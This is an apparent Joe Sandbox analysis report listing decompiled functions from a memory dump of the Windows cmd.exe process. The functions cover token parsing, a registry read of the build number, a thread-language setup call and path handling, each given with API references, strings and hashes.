API String ID: 4273384694-1883958293
Opcode ID: c3024adc809ce809f98c4aba36e38897eca87da1c9ce39b0799f08f4d5b36037
Instruction ID: b03b68461f10088d7236d2d4860cfdf8738385bb5f6f12de2add2ebf67ba8784
Opcode Fuzzy Hash: c3024adc809ce809f98c4aba36e38897eca87da1c9ce39b0799f08f4d5b36037
Instruction Fuzzy Hash: 3D11E4B2901527BBA7627EBC8A0C876BB78FF003507190252FA01D7A50D721DD2097F2

Uniqueness

Uniqueness Score: -1.00%

Function 00D868D9, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00D868D9(void* __ecx, intOrPtr __edx, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _t16;
				signed int _t19;
				signed int _t21;
				intOrPtr _t24;
				signed int _t38;
				long _t40;
				signed short* _t44;

				_push(__ecx);
				_push(__ecx);
				_v12 = __edx;
				_t44 = E00D8DEF9(__ecx);
				_t16 =  *_t44 & 0x0000ffff;
				if(_t16 != 0x3a) {
					if(_t16 != 0x2b) {
						goto L2;
					} else {
						goto L1;
					}
					L10:
					_t19 = _v8;
					 *((short*)(_v12 + _t19 * 2)) = 0;
					return _t19;
					L17:
				} else {
					L1:
					_t44 =  &(_t44[1]);
				}
				L2:
				_t24 = _a8;
				if(_t24 == 0) {
					_t44 = E00D8DEF9(_t44);
				}
				_v8 = _v8 & 0x00000000;
				_t40 =  *_t44 & 0x0000ffff;
				while(_t24 == 0 || wcschr(L"=,;", _t40) == 0) {
					if(wcschr(L"+:\n\r\t ", _t40) == 0) {
						if(_t24 == 0) {
							if(E00D8D7D4(L"&<|>", _t40) == 0) {
								if(_t40 != 0x5e) {
									goto L8;
								} else {
									_t44 =  &(_t44[1]);
									_t38 =  *_t44 & 0x0000ffff;
									goto L9;
								}
								goto L17;
							}
						} else {
							L8:
							_t38 = _t40 & 0x0000ffff;
							L9:
							_t32 = _v8;
							_t44 =  &(_t44[1]);
							_t7 = _t32 + 1; // 0x1
							_t21 = _t7;
							 *(_v12 + _v8 * 2) = _t38;
							_t40 =  *_t44 & 0x0000ffff;
							_v8 = _t21;
							if(_t21 < 0x7f) {
								continue;
							}
						}
					}
					goto L10;
				}
				goto L10;
			}

0x00d868de
0x00d868df
0x00d868e3
0x00d868eb
0x00d868ed
0x00d868f3
0x00d86970
0x00000000
0x00d86972
0x00000000
0x00d86972
0x00d86958
0x00d86958
0x00d86963
0x00d8696a
0x00000000
0x00d868f5
0x00d868f5
0x00d868f5
0x00d868f5
0x00d868f8
0x00d868f8
0x00d868fd
0x00d9be67
0x00d9be67
0x00d86903
0x00d86907
0x00d8690a
0x00d86930
0x00d86934
0x00d9be7c
0x00d9be86
0x00000000
0x00d9be8c
0x00d9be8c
0x00d9be8f
0x00000000
0x00d9be8f
0x00000000
0x00d9be86
0x00d8693a
0x00d8693a
0x00d8693a
0x00d8693d
0x00d8693d
0x00d86940
0x00d86946
0x00d86946
0x00d86949
0x00d8694d
0x00d86950
0x00d86956
0x00000000
0x00000000
0x00d86956
0x00d86934
0x00000000
0x00d86930
0x00000000

APIs

Part of subcall function 00D8DEF9: iswspace.MSVCRT ref: 00D8DF07
Part of subcall function 00D8DEF9: wcschr.MSVCRT ref: 00D8DF18

wcschr.MSVCRT ref: 00D86914
wcschr.MSVCRT ref: 00D86926

Strings

=,;, xrefs: 00D8690F
+: , xrefs: 00D86921
&<|>, xrefs: 00D9BE70

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: wcschr$iswspace
String ID: &<|>$+: $=,;
API String ID: 3458554142-2256444845
Opcode ID: c08b24144b2ec6a797eb798f64eaad0061530e8270144ad087d665c966cb72dd
Instruction ID: 9a494816177b6c0634477e7cc8eee22fdc24d7ce89f0e6e177e4701892de39b3
Opcode Fuzzy Hash: c08b24144b2ec6a797eb798f64eaad0061530e8270144ad087d665c966cb72dd
Instruction Fuzzy Hash: 7C210862A04255DACB24BB66880457DB7E5EFA5730B29005AF8C4DB2C0E7318C00D770

Uniqueness

Uniqueness Score: -1.00%

Function 00D84476, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D84476() {
				void* _v8;
				int _v12;
				int _v16;
				char _v20;
				long _t17;
				int _t20;

				_t20 = 4;
				_v16 = _t20;
				if(RegOpenKeyExW(0x80000002, L"Software\\Microsoft\\Windows NT\\CurrentVersion", 0, 0x2000000,  &_v8) != 0) {
					L5:
					return 0;
				}
				_v12 = _t20;
				_t17 = RegQueryValueExW(_v8, L"UBR", 0,  &_v12,  &_v20,  &_v16);
				RegCloseKey(_v8);
				if(_t17 != 0 || _v12 != _t20) {
					goto L5;
				} else {
					return _v20;
				}
			}

0x00d84481
0x00d84485
0x00d844a2
0x00d844e1
0x00000000
0x00d844e1
0x00d844a8
0x00d844be
0x00d844c9
0x00d844d2
0x00000000
0x00d844d9
0x00000000
0x00d844d9

APIs

RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,02000000,?), ref: 00D8449A
RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,UBR,00000000,?,?,?), ref: 00D844BE
RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00D844C9

Strings

Software\Microsoft\Windows NT\CurrentVersion, xrefs: 00D84490
UBR, xrefs: 00D844B6

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
API String ID: 3677997916-3870813718
Opcode ID: d92a9f010bcabcf904ab5ed17a4ebc326f1a01e723622572d0207717da372ae4
Instruction ID: fe8751c9641e7b18a2d4e47f4a36678558eecfc235b72131c06590be236f6abc
Opcode Fuzzy Hash: d92a9f010bcabcf904ab5ed17a4ebc326f1a01e723622572d0207717da372ae4
Instruction Fuzzy Hash: B4016D76A8021ABBDB21AA95DC49FEFFBBCEB84710F140196F902E2140D2705A04DB64

Uniqueness

Uniqueness Score: -1.00%

Function 00D9465D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E00D9465D(void* __ecx) {
				signed int _v8;
				void* __esi;
				signed int _t3;
				int _t6;
				struct HINSTANCE__* _t8;
				void* _t10;
				void* _t15;
				void* _t16;
				_Unknown_base(*)()* _t18;
				void* _t19;
				signed int _t20;

				_push(__ecx);
				_t3 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t3 ^ _t20;
				_t18 =  *0xdad5f8; // 0x0
				if(_t18 != 0) {
					L6:
					 *0xdc94b4(0);
					_t6 =  *_t18();
					L7:
					_pop(_t19);
					return E00D96FD0(_t6, _t10, _v8 ^ _t20, _t15, _t16, _t19);
				}
				_t8 =  *0xdad0d0; // 0xffffffff
				if(_t8 != 0xffffffff) {
					L3:
					if(_t8 != 0) {
						_t18 = GetProcAddress(_t8, "SetThreadUILanguage");
						 *0xdad5f8 = _t18;
					}
					L5:
					if(_t18 == 0) {
						_t6 = SetThreadLocale(0x409);
						goto L7;
					}
					goto L6;
				}
				_t8 = GetModuleHandleW(L"KERNEL32.DLL");
				_t18 =  *0xdad5f8; // 0x0
				 *0xdad0d0 = _t8;
				if(_t8 == 0xffffffff) {
					goto L5;
				}
				goto L3;
			}

0x00d94662
0x00d94663
0x00d9466a
0x00d9466e
0x00d94676
0x00d946bd
0x00d946c1
0x00d946c7
0x00d946c9
0x00d946ce
0x00d946d7
0x00d946d7
0x00d94678
0x00d94680
0x00d9469d
0x00d9469f
0x00d946ad
0x00d946af
0x00d946af
0x00d946b5
0x00d946b7
0x00d9e8ad
0x00000000
0x00d9e8ad
0x00000000
0x00d946b7
0x00d94687
0x00d9468d
0x00d94693
0x00d9469b
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL,?,?,?,00D94533), ref: 00D94687
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(FFFFFFFF,SetThreadUILanguage,?,?,?,00D94533), ref: 00D946A7

Strings

KERNEL32.DLL, xrefs: 00D94682
SetThreadUILanguage, xrefs: 00D946A1

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: KERNEL32.DLL$SetThreadUILanguage
API String ID: 1646373207-2530943252
Opcode ID: 825cecc5042f39f3ec62b9845bb69f5235e193d62c6b5f3176a063204c241765
Instruction ID: 6ef86ef9c3ea73d9d0cfbf1e2e683a323de2fd6338ef40f77e9406f4d7ba569d
Opcode Fuzzy Hash: 825cecc5042f39f3ec62b9845bb69f5235e193d62c6b5f3176a063204c241765
Instruction Fuzzy Hash: 3F012B71D013129BCB14AF34AC0DEA977A5DB07724B090345F812D77D0DB309C0287B4

Uniqueness

Uniqueness Score: -1.00%

Function 00D91F52, Relevance: 7.8, APIs: 5, Instructions: 293
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00D91F52(void* __ebx, wchar_t* __ecx, wchar_t* __edx, void* __edi, void* __esi, void* __eflags) {
				wchar_t* _t92;
				void* _t104;
				void* _t108;
				wchar_t* _t110;
				wchar_t** _t111;
				long _t117;
				short* _t118;
				void _t121;
				void* _t123;
				long _t128;
				wchar_t* _t130;
				wchar_t* _t137;
				void* _t146;
				wchar_t** _t155;
				wchar_t** _t158;
				void _t164;
				wchar_t* _t168;
				void _t171;
				intOrPtr _t175;
				long* _t180;
				void* _t188;
				signed int _t191;
				void _t199;
				void* _t203;
				void* _t204;
				wchar_t** _t205;
				long* _t206;
				void* _t207;
				wchar_t* _t209;
				long* _t217;
				void _t218;
				signed int _t220;
				wchar_t* _t223;
				void _t224;
				wchar_t* _t225;
				void* _t226;

				_push(0xc0);
				_push(0xdabdb8);
				E00D975CC(__ebx, __edi, __esi);
				_t216 = __edx;
				_t223 = __ecx;
				 *(_t226 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t226 - 0xc4)) = __edx;
				_t92 =  *(_t226 + 0xc);
				 *(_t226 - 0xc0) = _t92;
				 *(_t226 - 0xb8) = _t92;
				 *((intOrPtr*)(_t226 - 0xb4)) = 0x90;
				 *((intOrPtr*)(_t226 - 0xb0)) = 5;
				memset(_t226 - 0xac, 0, 0x88);
				 *((intOrPtr*)(_t226 - 0xcc)) = 0;
				_t155 =  *0xdc3cc4;
				_t155[0xc] = 0;
				 *0xdad0da = 0;
				 *((intOrPtr*)(_t226 - 4)) = 0;
				 *(_t226 - 0xac) =  *(_t226 - 0xc0);
				_push(0x3a);
				if( *0xdc3cc9 == 0) {
					_pop(_t224);
				} else {
					_pop(_t224);
					if( *((intOrPtr*)( *((intOrPtr*)(_t223 + 0x38)))) == _t224) {
						 *(_t226 - 0xac) =  *(_t155[0x44]);
					}
				}
				if(E00D97797(_t155) == 0) {
					_t157 = 1;
					goto L5;
				} else {
					 *((intOrPtr*)(_t226 - 0xc8)) = 0;
					_t146 =  *0xdcc010(_t226 - 0xb4, _t226 - 0xcc,  &(( *0xdc3cc4)[0xc]), _t216, _t226 - 0xc8);
					_t157 = 1;
					if(_t146 == 1) {
						__eflags =  *((intOrPtr*)(_t226 - 0xc8)) - 1;
						if( *((intOrPtr*)(_t226 - 0xc8)) == 1) {
							_push(0);
							_push(0x4ec);
							E00D8C5A2(1);
							_t157 = 1;
							__eflags = 1;
						}
						 *((intOrPtr*)(_t226 - 4)) = 0xfffffffe;
						L36:
						return E00D97614(0, _t216, _t224);
					}
					L5:
					 *((intOrPtr*)(_t226 - 4)) = 0xfffffffe;
					_t199 =  *(_t226 - 0xc0);
					 *0xdad0da = _t157;
					_t158 =  *0xdc3cc4;
					_t158[2] = 0;
					 *_t158 = _t216;
					_t97 =  *(_t226 + 8);
					_t158[1] =  *(_t226 + 8);
					if( *0xdc3cc9 == 0) {
						L39:
						__eflags = E00D92D22(_t216, _t97, _t199);
						if(__eflags == 0) {
							goto L9;
						}
						goto L49;
					} else {
						_t137 =  *(_t226 - 0xbc);
						_t235 =  *(_t137[0xe]) - _t224;
						if( *(_t137[0xe]) != _t224) {
							_t97 =  *(_t226 + 8);
							goto L39;
						}
						_t225 = _t158[0x44];
						E00D91040(_t216,  *(_t226 + 8),  *_t225);
						( *0xdc3cc4)[2] = _t225[2];
						L9:
						_t216 = 0x2000;
						E00D92A7C(_t226 - 0xc0, 0x2000, _t235);
						_t224 =  *(_t226 - 0xc0);
						if(_t224 == 0) {
							_push(0);
							L48:
							__imp__??_V@YAXPAX@Z();
							L49:
							goto L36;
						}
						E00D91040(_t224, 0x2000, ( *(_t226 - 0xbc))[0xe]);
						_t164 = _t224;
						_t203 = _t164 + 2;
						do {
							_t104 =  *_t164;
							_t164 = _t164 + 2;
						} while (_t104 != 0);
						_t168 = _t224 + ((_t164 - _t203 >> 1) + 1) * 2;
						 *(_t226 - 0xb8) = _t168;
						 *_t168 = 0;
						_t106 =  *(_t226 - 0xbc);
						if(( *(_t226 - 0xbc))[0xf] != 0) {
							_t216 = 0x2000 - (_t168 - _t224 >> 1);
							E00D91040(_t168, 0x2000, _t106[0xf]);
						}
						E00D92A06(( *0xdc3cc4)[3], _t216);
						_t171 = _t224;
						_t204 = _t171 + 2;
						do {
							_t108 =  *_t171;
							_t171 = _t171 + 2;
						} while (_t108 != 0);
						( *0xdc3cc4)[0x19] = _t171 - _t204 >> 1;
						_t110 = E00D8DF40(_t224);
						_t205 =  *0xdc3cc4;
						_t205[0xf] = _t110;
						if(_t110 == 0) {
							L50:
							_push(_t224);
							goto L48;
						}
						_t205[0x23] = _t110;
						_t111 =  &(_t205[0x1a]);
						_t175 = 9;
						 *((intOrPtr*)(_t226 - 0xc4)) = _t175;
						do {
							 *((intOrPtr*)(_t111 - 0x28)) = 0;
							 *_t111 = 0;
							_t111 =  &(_t111[1]);
							_t175 = _t175 - 1;
						} while (_t175 != 0);
						_t216 =  *(_t226 - 0xb8);
						if( *_t216 == 0) {
							_t205[0xe] = 0;
							_t205[0xd] = 0;
							L35:
							_t205[4] =  *0xdc3cd8;
							__imp__??_V@YAXPAX@Z(_t224);
							goto L36;
						}
						_t206 = E00D8DF40(_t216 + wcsspn(_t216, L" \t") * 2);
						( *0xdc3cc4)[0xd] = _t206;
						if(_t206 == 0) {
							goto L50;
						}
						_t180 = _t206;
						_t56 =  &(_t180[0]); // 0x2
						_t216 = _t56;
						do {
							_t117 =  *_t180;
							_t180 =  &(_t180[0]);
						} while (_t117 != 0);
						_t118 = _t206 + (_t180 - _t216 >> 1) * 2;
						while(_t118 != _t206) {
							_t191 =  *(_t118 - 2) & 0x0000ffff;
							if(_t191 == 0x20 || _t191 ==  *((intOrPtr*)(_t226 - 0xc4))) {
								_t118 = _t118 + 0xfffffffe;
								continue;
							} else {
								break;
							}
						}
						 *_t118 = 0;
						if( *0xdc3cc9 == 0) {
							_t217 = ( *0xdc3cc4)[0xd];
							while(1) {
								_t207 = 0x2f;
								_t216 = E00D8D7D4(_t217, _t207);
								 *(_t226 - 0xb8) = _t216;
								__eflags = _t216;
								if(_t216 == 0) {
									goto L28;
								}
								_t217 =  &(_t216[0]);
								_t128 = towupper( *_t217 & 0x0000ffff);
								__eflags = _t128 - 0x51;
								if(_t128 != 0x51) {
									continue;
								}
								 *0xdad0c8 = 0;
								_t190 =  *(_t226 - 0xb8);
								_t209 =  *(_t226 - 0xb8);
								 *(_t226 - 0xb8) =  &(_t209[0]);
								do {
									_t130 =  *_t209;
									_t209 =  &(_t209[0]);
									__eflags = _t130;
								} while (_t130 != 0);
								_t90 =  &(_t217[0]); // 0x0
								E00D91040(_t190, (_t209 -  *(_t226 - 0xb8) >> 1) + 1, _t90);
								goto L28;
							}
						}
						L28:
						_t121 = E00D8EA40(( *0xdc3cc4)[0xd], 0, 0);
						 *(_t226 - 0xc0) = _t121;
						_t205 =  *0xdc3cc4;
						if( *_t121 == 0) {
							L34:
							_t205[0xe] = _t121;
							goto L35;
						}
						_t216 =  &(_t205[0x1a]);
						 *(_t226 - 0xbc) = _t216;
						_t188 = 1;
						while(_t188 < 0xa) {
							 *(_t216 - 0x28) = _t121;
							_t218 = _t121;
							_t66 = _t218 + 2; // 0x2
							 *(_t226 - 0xb8) = _t66;
							do {
								_t123 =  *_t218;
								_t218 = _t218 + 2;
							} while (_t123 != 0);
							_t220 = _t218 -  *(_t226 - 0xb8) >> 1;
							 *( *(_t226 - 0xbc)) = _t220;
							_t121 =  *(_t226 - 0xc0) + _t220 * 2 + 2;
							 *(_t226 - 0xc0) = _t121;
							_t188 = _t188 + 1;
							_t216 =  &(( *(_t226 - 0xbc))[1]);
							 *(_t226 - 0xbc) = _t216;
							if( *_t121 != 0) {
								continue;
							}
							goto L34;
						}
						goto L34;
					}
				}
			}

0x00d91f52
0x00d91f57
0x00d91f5c
0x00d91f61
0x00d91f63
0x00d91f65
0x00d91f6b
0x00d91f71
0x00d91f74
0x00d91f7a
0x00d91f80
0x00d91f8a
0x00d91fa3
0x00d91fab
0x00d91fb1
0x00d91fb7
0x00d91fba
0x00d91fc0
0x00d91fc9
0x00d91fcf
0x00d91fd7
0x00d9d476
0x00d91fdd
0x00d91fe0
0x00d91fe4
0x00d91fee
0x00d91fee
0x00d91fe4
0x00d91ffb
0x00d9d4a4
0x00000000
0x00d92001
0x00d92001
0x00d92026
0x00d9202e
0x00d92031
0x00d9d47c
0x00d9d482
0x00d9d484
0x00d9d485
0x00d9d48a
0x00d9d493
0x00d9d493
0x00d9d493
0x00d9d494
0x00d92281
0x00d92286
0x00d92286
0x00d92037
0x00d92037
0x00d9203e
0x00d92044
0x00d9204a
0x00d92050
0x00d92053
0x00d92055
0x00d92058
0x00d92062
0x00d92294
0x00d9229e
0x00d922a0
0x00000000
0x00000000
0x00000000
0x00d92068
0x00d92068
0x00d92071
0x00d92074
0x00d92291
0x00000000
0x00d92291
0x00d9207a
0x00d92087
0x00d92095
0x00d92098
0x00d92098
0x00d920a5
0x00d920aa
0x00d920b2
0x00d9d4fa
0x00d9d4fb
0x00d9d4fb
0x00d9d502
0x00000000
0x00d9d504
0x00d920c5
0x00d920ca
0x00d920cc
0x00d920cf
0x00d920cf
0x00d920d2
0x00d920d5
0x00d920df
0x00d920e2
0x00d920ea
0x00d920ed
0x00d920f7
0x00d92102
0x00d92106
0x00d92106
0x00d92114
0x00d92119
0x00d9211b
0x00d9211e
0x00d9211e
0x00d92121
0x00d92124
0x00d92132
0x00d92137
0x00d9213c
0x00d92142
0x00d92147
0x00d9d50c
0x00d9d50c
0x00000000
0x00d9d50c
0x00d9214d
0x00d92153
0x00d92158
0x00d92159
0x00d9215f
0x00d9215f
0x00d92162
0x00d92164
0x00d92167
0x00d92167
0x00d9216c
0x00d92175
0x00d922ab
0x00d922ae
0x00d9226f
0x00d92274
0x00d92278
0x00000000
0x00d9227f
0x00d92191
0x00d92198
0x00d9219d
0x00000000
0x00000000
0x00d921a3
0x00d921a5
0x00d921a5
0x00d921a8
0x00d921a8
0x00d921ab
0x00d921ae
0x00d921b7
0x00d921ba
0x00d921be
0x00d921c5
0x00d92289
0x00000000
0x00000000
0x00000000
0x00000000
0x00d921c5
0x00d921da
0x00d921e3
0x00d9d514
0x00d9d517
0x00d9d519
0x00d9d521
0x00d9d523
0x00d9d529
0x00d9d52b
0x00000000
0x00000000
0x00d9d531
0x00d9d538
0x00d9d53f
0x00d9d543
0x00000000
0x00000000
0x00d9d545
0x00d9d54b
0x00d9d551
0x00d9d556
0x00d9d55c
0x00d9d55c
0x00d9d55f
0x00d9d562
0x00d9d562
0x00d9d56f
0x00d9d574
0x00000000
0x00d9d574
0x00d9d517
0x00d921e9
0x00d921f5
0x00d921fa
0x00d92200
0x00d92209
0x00d9226c
0x00d9226c
0x00000000
0x00d9226c
0x00d9220b
0x00d9220e
0x00d92216
0x00d92217
0x00d9221c
0x00d9221f
0x00d92221
0x00d92224
0x00d9222a
0x00d9222a
0x00d9222d
0x00d92230
0x00d9223b
0x00d92243
0x00d9224e
0x00d92251
0x00d92257
0x00d9225e
0x00d92261
0x00d9226a
0x00000000
0x00000000
0x00000000
0x00d9226a
0x00000000
0x00d92217
0x00d92062

APIs

memset.MSVCRT ref: 00D91FA3
wcsspn.MSVCRT ref: 00D92181
??_V@YAXPAX@Z.MSVCRT ref: 00D92278

Part of subcall function 00D92D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,00D93C29,?,00000000,-00000001,00000000,?,00000000), ref: 00D92D87
Part of subcall function 00D92D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00D93C29,?,00000000,-00000001,00000000,?,00000000), ref: 00D92D91
Part of subcall function 00D92D22: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,00D93C29,?,00000000,-00000001,00000000,?,00000000), ref: 00D92DA4
Part of subcall function 00D92D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00D93C29,?,00000000,-00000001,00000000,?,00000000), ref: 00D92DAE

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: ErrorMode$FullNamePathmemsetwcsspn
String ID:
API String ID: 1535828850-0
Opcode ID: ddd21824d512f421e0d6dafb52f790918731e17e9fb6e703fb6c3ee396be1799
Instruction ID: c9e4f775f2f3b11f51ad1be35d792e3dc5967418de8f29db214a7c1272ab9288
Opcode Fuzzy Hash: ddd21824d512f421e0d6dafb52f790918731e17e9fb6e703fb6c3ee396be1799
Instruction Fuzzy Hash: 87C16275A00216DFCF65DF28D890BA9B7B6FF85300F18819AD54A9B391DB309E81CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00D93B5D, Relevance: 7.7, APIs: 5, Instructions: 155
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00D93B5D(signed short* __ecx, int __edx) {
				signed int _v8;
				int _v20;
				char _v24;
				void* _v28;
				void _v548;
				WCHAR* _v552;
				signed int _v556;
				signed short* _v560;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t31;
				int _t46;
				signed int _t52;
				signed short* _t58;
				signed int _t59;
				intOrPtr _t63;
				signed short* _t65;
				void* _t77;
				signed short* _t78;
				void* _t79;
				signed short* _t84;
				signed short** _t87;
				signed int _t88;

				_t82 = __edx;
				_t31 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t31 ^ _t88;
				_v24 = 1;
				_t65 = 0;
				_v20 = 0x104;
				_v28 = 0;
				_t84 = __ecx;
				memset( &_v548, 0, 0x104);
				if(E00D90C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L18:
					_t87 = 1;
				} else {
					0xffce = 0x24;
					_t87 = E00D900B0(0xffce);
					if(_t87 == 0) {
						L22:
						E00DA9287(0xffce);
						__imp__longjmp(0xdbb8b8, 1);
						goto L23;
					} else {
						 *_t87 = _t84;
						E00D8C923(_t87);
						_t84 = _t87[3];
						_v560 = _t87[6];
						_v552 =  *_t87;
						_t63 = E00D900B0(0xffce);
						if(_t63 == 0) {
							goto L22;
						} else {
							 *0xdc3cec = _t63;
							E00D936CB(0, _t63, 0x7fe7, 0);
							_t72 = _v28;
							if(_v28 == 0) {
								L23:
								_t72 =  &_v548;
							}
						}
					}
					_t82 = _v20;
					if(E00D92D22(_t72, _v20, _v552) != 0) {
						goto L18;
					} else {
						_t73 = _v28;
						if(_v28 == 0) {
							_t73 =  &_v548;
						}
						_t46 = 0x5c;
						_t82 = _t46;
						 *((short*)(E00D92349(_t73, _t46) + 2)) = 0;
						_t48 = _v28;
						if(_v28 == 0) {
							_t48 =  &_v548;
						}
						E00D90D89(_t82, _t48);
						if(_t84 == 0) {
							L20:
							E00D8C923(_t87);
							_t87[6] = _v560;
						} else {
							_t52 =  *_t84 & 0x0000ffff;
							_t82 = 0x3a;
							if(_t52 == _t82) {
								goto L20;
							} else {
								_t77 = 0x5c;
								if(_t52 == _t77) {
									_t58 = _v552;
									if(_t84 == _t58) {
										L21:
										_t84 =  &(_t84[1]);
									} else {
										while( *_t58 != _t65) {
											_t78 = _t58;
											_t58 =  &(_t58[1]);
											if(_t58 != _t84) {
												continue;
											}
											L13:
											_t59 =  *_t78 & 0x0000ffff;
											if(_t59 == _t82) {
												goto L21;
											} else {
												_t79 = 0x5c;
												if(_t59 == _t79) {
													goto L21;
												}
											}
											goto L15;
										}
										_t78 = _t65;
										goto L13;
									}
								}
								L15:
								_v556 =  *_t84 & 0x0000ffff;
								 *_t84 = 0;
								if(GetFileAttributesW(_v552) == 0xffffffff) {
									_t65 = GetLastError();
								}
								 *0xdc3cf0 = _t65;
								 *_t84 = _v556;
								if( *0xdc3cf0 == 0) {
									goto L20;
								} else {
									goto L18;
								}
							}
						}
					}
				}
				__imp__??_V@YAXPAX@Z();
				return E00D96FD0(_t87, _t65, _v8 ^ _t88, _t82, _t84, _t87, _v28);
			}

0x00d93b5d
0x00d93b68
0x00d93b6f
0x00d93b7a
0x00d93b7e
0x00d93b80
0x00d93b8a
0x00d93b8f
0x00d93b91
0x00d93bb7
0x00d93cf0
0x00d93cf2
0x00d93bbd
0x00d93bbf
0x00d93bc5
0x00d93bc9
0x00d9e009
0x00d9e009
0x00d9e015
0x00000000
0x00d93bcf
0x00d93bd1
0x00d93bd3
0x00d93be0
0x00d93be3
0x00d93beb
0x00d93bf1
0x00d93bf8
0x00000000
0x00d93bfe
0x00d93c04
0x00d93c0b
0x00d93c10
0x00d93c15
0x00d9e01b
0x00d9e01b
0x00d9e01b
0x00d93c15
0x00d93bf8
0x00d93c21
0x00d93c2b
0x00000000
0x00d93c31
0x00d93c31
0x00d93c36
0x00d9e026
0x00d9e026
0x00d93c3e
0x00d93c3f
0x00d93c48
0x00d93c4c
0x00d93c51
0x00d9e031
0x00d9e031
0x00d93c5d
0x00d93c64
0x00d93d10
0x00d93d12
0x00d93d1d
0x00d93c6a
0x00d93c6a
0x00d93c6f
0x00d93c73
0x00000000
0x00d93c79
0x00d93c7b
0x00d93c7f
0x00d93c81
0x00d93c89
0x00d93d22
0x00d93d22
0x00d93c8f
0x00d93c8f
0x00d93c98
0x00d93c9a
0x00d93c9f
0x00000000
0x00000000
0x00d93ca1
0x00d93ca1
0x00d93ca7
0x00000000
0x00d93ca9
0x00d93cab
0x00d93caf
0x00000000
0x00000000
0x00d93caf
0x00000000
0x00d93ca7
0x00d9e03c
0x00000000
0x00d9e03c
0x00d93c89
0x00d93cb1
0x00d93cba
0x00d93cc2
0x00d93cce
0x00d93cd6
0x00d93cd6
0x00d93cde
0x00d93ce4
0x00d93cee
0x00000000
0x00000000
0x00000000
0x00000000
0x00d93cee
0x00d93c73
0x00d93c64
0x00d93c2b
0x00d93cf6
0x00d93d0f

APIs

memset.MSVCRT ref: 00D93B91

Part of subcall function 00D90C70: ??_V@YAXPAX@Z.MSVCRT ref: 00D90CBA
Part of subcall function 00D90C70: memset.MSVCRT ref: 00D90CDD

??_V@YAXPAX@Z.MSVCRT ref: 00D93CF6

Part of subcall function 00D900B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00D8DF68,00000001,?,00000000,00D93458,-00000105,00DABDD8,00000240,00D94B82,00000000,00000000,00D9AE6E,00000000), ref: 00D900C1
Part of subcall function 00D900B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D8DF68,00000001,?,00000000,00D93458,-00000105,00DABDD8,00000240,00D94B82,00000000,00000000,00D9AE6E,00000000,?), ref: 00D900C8

longjmp.MSVCRT(00DBB8B8,00000001,-00000001,00000000,?,00000000), ref: 00D9E015

Part of subcall function 00D8C923: _wcsicmp.MSVCRT ref: 00D8C9CF
Part of subcall function 00D8C923: _wcsicmp.MSVCRT ref: 00D8C9E5
Part of subcall function 00D8C923: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,00000000,?,00000000), ref: 00D8CA04
Part of subcall function 00D8C923: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D8CA15

